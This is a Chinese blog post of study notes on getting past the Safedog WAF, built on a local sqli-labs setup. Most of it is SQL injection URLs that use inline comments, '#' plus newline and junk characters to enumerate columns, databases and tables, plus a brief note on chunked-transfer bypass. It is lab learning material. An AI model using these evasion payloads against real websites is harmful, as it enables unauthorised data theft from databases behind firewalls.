
<!DOCTYPE html>
<html lang="zh-Hans" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>bypass 学习笔记之绕安全狗bypass safedog - 像清水一般清澈透明</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="清水Samny,"> 
    <meta name="description" content="@toc


前言
走上安全这条路也有9个月了，虽然中途有两个月一直在准备其他的事情，但是安全这条路一直在坚持着。学习安全这么久了，从一开始的脚本小子，我也一直想转变一下，改变自己的现状，但是因为种,"> 
    <meta name="author" content="Samny"> 
    <link rel="alternative" href="atom.xml" title="像清水一般清澈透明" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
<link rel="stylesheet" href="/css/diaspora.css">

    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads"
        src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
<meta name="generator" content="Hexo 4.1.1"></head>

<body class="loading">
    <span id="config-title" style="display:none">像清水一般清澈透明</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="icon-home image-icon" href="javascript:;" data-url="http://yoursite.com"></a>
    <div title="播放/暂停" class="icon-play"></div>
    <h3 class="subtitle">bypass 学习笔记之绕安全狗bypass safedog</h3>
    <div class="social">
        <!--<div class="like-icon">-->
            <!--<a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
        <!--</div>-->
        <div>
            <div class="share">
                <a title="获取二维码" class="icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">bypass 学习笔记之绕安全狗bypass safedog</h1>
        <div class="stuff">
            <span>二月 03, 2020</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/bypass/" rel="tag">bypass</a></li></ul>


        </div>
        <div class="content markdown">
            <p>@<a href="目录">toc</a></p>
<p><img src="https://img-blog.csdnimg.cn/20191204193451558.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<hr>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><hr>
<p>走上安全这条路也有9个月了，虽然中途有两个月一直在准备其他的事情，但是安全这条路一直在坚持着。<br>学习安全这么久了，从一开始的脚本小子，我也一直想转变一下，改变自己的现状，但是因为种种事情，给耽误了这个计划。<br>因为接触最多漏洞应该是SQL注入吧，所以我第一想到就是bypass SQL注入。为什么选择安全狗呢？这个waf。。。。这个是因为我遇到的最多是这个waf。<br><code>大家看完可能发现这些东西可能是参考里面差不多的，为啥我还要重新写一波？我只是单纯的想加深一下自己下印象，加深记忆。只是做为自己的学习笔记而已，大佬们不要喷。</code></p>
<hr>
<h1 id="0x00-前期准备"><a href="#0x00-前期准备" class="headerlink" title="0x00 前期准备"></a>0x00 前期准备</h1><p>虚拟机windows7<br>phpstudy<a href="https://www.xp.cn/" target="_blank" rel="noopener">^1</a>（为啥选这个我就不说了）<br><code>如果你是使用的phpstudy，请务必将sql的版本调到5.5以上，因为这样你的数据库内才会有information_schema数据库，方便进行实验测试。</code><a href="https://blog.csdn.net/sdb5858874/article/details/80727555" target="_blank" rel="noopener">^2</a><br>环境<img src="https://img-blog.csdnimg.cn/20191204203333353.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>sqli-labs<a href="https://github.com/Audi-1/sqli-labs" target="_blank" rel="noopener">^3</a>（我相信大家也不陌生）<br>这里下载之后要在相关地方修改一下，修改一下数据库密码。具体搭建步骤可以看<a href="https://blog.csdn.net/qq_35811830/article/details/90302307" target="_blank" rel="noopener">sqli-labs环境搭建</a>这里就不多做叙述。<br><img src="https://img-blog.csdnimg.cn/20191204195039251.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<hr>
<h1 id="0x01-开始尝试绕开"><a href="#0x01-开始尝试绕开" class="headerlink" title="0x01 开始尝试绕开"></a>0x01 开始尝试绕开</h1><h2 id="判断字段数"><a href="#判断字段数" class="headerlink" title="判断字段数"></a>判断字段数</h2><p><code>内联绕过</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.116.130:8001&#x2F;Less-1&#x2F;?id&#x3D;1%27&#x2F;*!14440order by*&#x2F; 3-- +</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191204195703439.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.116.130:8001&#x2F;Less-1&#x2F;?id&#x3D;1%27&#x2F;*!10450order%20by*&#x2F;%203--%20+</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191204202830345.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>经过自己短暂Fuzz之后发现<br>?id=1%27/<em>!<code>10450</code>order%20by</em>/%203–%20+<br>内联其中的10450这个数值不一样，safedog 拦截情况不一样。（这个情况我也不是很清楚是为啥，因为我也不懂MySQL的查询原理。如果有大佬知道可以评论说明一下，小的不甚感激！）<br><img src="https://img-blog.csdnimg.cn/20191204212827898.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20191204202935900.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><code>注释</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.116.130:8001&#x2F;Less-1&#x2F;?id&#x3D;1%20order%23by%203%20--+</span><br></pre></td></tr></table></figure>
<p>无意中我发现原文中写的是注释换行，但我发现不用换行也能绕过。<br><code>1%20order%23by%203%20--+</code> 区别在%23后面加%0A。</p>
<p><img src="https://img-blog.csdnimg.cn/20191204204251572.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h2 id="联合查询"><a href="#联合查询" class="headerlink" title="联合查询"></a>联合查询</h2><p><code>union select</code><br>经过不断Fuzz<a href="推荐一个不断Fuzz的文章，在此我就不多累赘了。https://blog.csdn.net/q1352483315/article/details/90175002">^4</a>,你会发现狗只会咬select这个字，不会考虑union。<br><img src="https://img-blog.csdnimg.cn/20191204204922648.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><code>内联</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.116.130:8001&#x2F;Less-1&#x2F;?id&#x3D;-1%27%20union%20&#x2F;*!10440select*&#x2F;%201,2,3%20--+</span><br></pre></td></tr></table></figure>
<p>参考文章是连union也内联注释了一下。<br><img src="https://img-blog.csdnimg.cn/20191204203631472.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><code>注释+垃圾字符</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.116.130:8001&#x2F;Less-1&#x2F;?id&#x3D;-1%27%20union%230%0Aselect%201,2,3%20--+</span><br></pre></td></tr></table></figure>
<p>垃圾字符可以多点，字符无所谓是什么，最少要一个，亲测。<br><img src="https://img-blog.csdnimg.cn/20191204211435175.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20191204211158654.png" alt="在这里插入图片描述"></p>
<h2 id="爆数据"><a href="#爆数据" class="headerlink" title="爆数据"></a>爆数据</h2><p>下面就不一一截图了，不然篇幅太长了。<br><code>获取数据库名</code><br>查当前数据库名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">大佬骚操作</span><br><span class="line">http:&#x2F;&#x2F;localhost&#x2F;sqli-labs&#x2F;Less-1&#x2F;?id&#x3D;-1%27%20union%20all--+x%0Aselect%201,2,database&#x2F;*!00000()*&#x2F;--+</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">这个是我自己结合前面的Fuzz出来操作</span><br><span class="line">http:&#x2F;&#x2F;192.168.116.130:8001&#x2F;Less-1&#x2F;?id&#x3D;-1%27%20union%23a%0Aselect%201,2,database%23%0A()--+</span><br></pre></td></tr></table></figure>
<p>差其他数据库名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">不知道为啥，我可以查到其他数据库，但在参考文章中是不可能的，玄学。</span><br><span class="line">http:&#x2F;&#x2F;192.168.116.130:8001&#x2F;Less-1&#x2F;?id&#x3D;-1%27%20union%20%23asdasdasd%0a%20select%201,(select%20schema_name%20from%20%23%0ainformation_schema.schemata%20%20limit%202,1),3%20--%20+</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191204213813597.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<hr>
<p><code>获取表名</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;sqli-labs&#x2F;Less-1&#x2F;?id&#x3D;-1%27%20union%20all--+x%0Aselect%201,2,group_concat(table_name)from%20sys.schema_auto_increment_columns%20where%20table_schema&#x3D;database&#x2F;*!&#x2F;*%23*&#x2F;*&#x2F;()--+</span><br></pre></td></tr></table></figure>

<hr>
<h1 id="0x03-配合使用分块传输插件bypass-dogwaf"><a href="#0x03-配合使用分块传输插件bypass-dogwaf" class="headerlink" title="0x03 配合使用分块传输插件bypass dogwaf"></a>0x03 配合使用分块传输插件bypass dogwaf</h1><p>之前偶尔看到了分块传输插件，可以过很多waf。今天得以试试。<br><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9zMi5heDF4LmNvbS8yMDE5LzEyLzE0L1FSSkNKMS5wbmc?x-oss-process=image/format,png" alt="QRJCJ1.png"><br><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9zMi5heDF4LmNvbS8yMDE5LzEyLzE0L1FSSm1vZC5wbmc?x-oss-process=image/format,png" alt="QRJmod.png"><br><img src="https://img-blog.csdnimg.cn/20191214151418588.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<hr>
<p>未完待续</p>
<hr>
<h1 id="Reference-Resources"><a href="#Reference-Resources" class="headerlink" title="Reference Resources"></a>Reference Resources</h1><p><a href="https://www.anquanke.com/post/id/188465" target="_blank" rel="noopener">https://www.anquanke.com/post/id/188465</a><br><a href="https://422926799.github.io/posts/aafbd292.html" target="_blank" rel="noopener">https://422926799.github.io/posts/aafbd292.html</a><br><a href="https://www.chabug.org/web/1019.html" target="_blank" rel="noopener">https://www.chabug.org/web/1019.html</a></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="true">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title='0' data-url='https://link.hhtjim.com/163/574566207.mp3'></li>
                        
                    
                        
                            <li title='1' data-url='https://link.hhtjim.com/qq/playsong.mp3'></li>
                        
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
        data-ae='true'
        data-ci='a69212da3fc88cd39af9'
        data-cs='19e2c5d71620cb7b14d99a908f8134be70bd83fa'
        data-r='gittalksamny'
        data-o='samny520'
        data-a='samny520'
        data-d='true'
    >查看评论</div>


    </div>
    
        <div class='side'>
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00-前期准备"><span class="toc-number">2.</span> <span class="toc-text">0x00 前期准备</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01-开始尝试绕开"><span class="toc-number">3.</span> <span class="toc-text">0x01 开始尝试绕开</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#判断字段数"><span class="toc-number">3.1.</span> <span class="toc-text">判断字段数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#联合查询"><span class="toc-number">3.2.</span> <span class="toc-text">联合查询</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#爆数据"><span class="toc-number">3.3.</span> <span class="toc-text">爆数据</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03-配合使用分块传输插件bypass-dogwaf"><span class="toc-number">4.</span> <span class="toc-text">0x03 配合使用分块传输插件bypass dogwaf</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Reference-Resources"><span class="toc-number">5.</span> <span class="toc-text">Reference Resources</span></a></li></ol>
        </div>
    
</div>


    </div>
</div>
<span id="busuanzi_container_page_pv">
   本文总阅读量<span id="busuanzi_value_page_pv"></span>次
</span>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/diaspora.js"></script>
<script src="/js/snow.js"></script>
<script src="/js/test.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>


<!-- 在想要使用窗口小部件的地方插入该标签 -->
<iframe width="900" height="401" src="https://cybermap.kaspersky.com/cn/widget/dynamic/dark" frameborder="0">

<!-- 百度api分析 -->
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?eadef2421de71beaad5d2a625cd47181";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>

<script type="text/javascript" src="//rf.revolvermaps.com/0/0/6.js?i=5jbaycl6wsf&amp;m=7&amp;c=e63100&amp;cr1=ffffff&amp;f=arial&amp;l=0&amp;bv=90&amp;lx=-420&amp;ly=420&amp;hi=20&amp;he=7&amp;hc=a8ddff&amp;rs=80" async="async"></script>


<!--富强民主点击特效-->
<script type="text/javascript"> 
    /* 鼠标特效 */ 
    var a_idx = 0; 
    var b_idx = 0; 
    /*   文字和颜色数组 */
    var a = new Array("清水", "Samny", "我爱你","小哥哥","小姐姐","大神","太帅了！","NB","英俊","潇洒","可爱" ); 
    var b = new Array("#FF0000","#FF7F00"," #FFFF00","#00FF00","#00FFFF","#0000FF","#8B00FF","#FF0000","#FF7F00"," #FFFF00","#00FF00","#00FFFF","#0000FF","#8B00FF");
    jQuery(document).ready(function($) { 
        $("body").click(function(e) { 
           
            var $i = $("<span/>").text(a[a_idx]); 
              a_idx=parseInt(11*Math.random()); //文字随机数
              b_idx=parseInt(10*Math.random()); //颜色随机数
            var x = e.pageX, 
            y = e.pageY; 
            $i.css({ 
                "z-index": 999, 
                "font-size":"1.3em",            //字体大小
                "top": y - 20, 
                "left": x, 
                "position": "absolute", 
                "font-weight": "bold", 
                "color": b[b_idx] 
            }); 
            $("body").append($i); 
            $i.animate({ 
                "top": y - 180, 
                "opacity": 0 
            }, 
            1500, 
            function() { 
                $i.remove(); 
            }); 
        }); 
    }); 
    </script>
    <!--富强民主点击特效-->





<!-- Google Analytics -->
<script type="text/javascript">
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', '218065278', 'auto');
  ga('send', 'pageview');
</script>
<!-- End Google Analytics -->


</html>
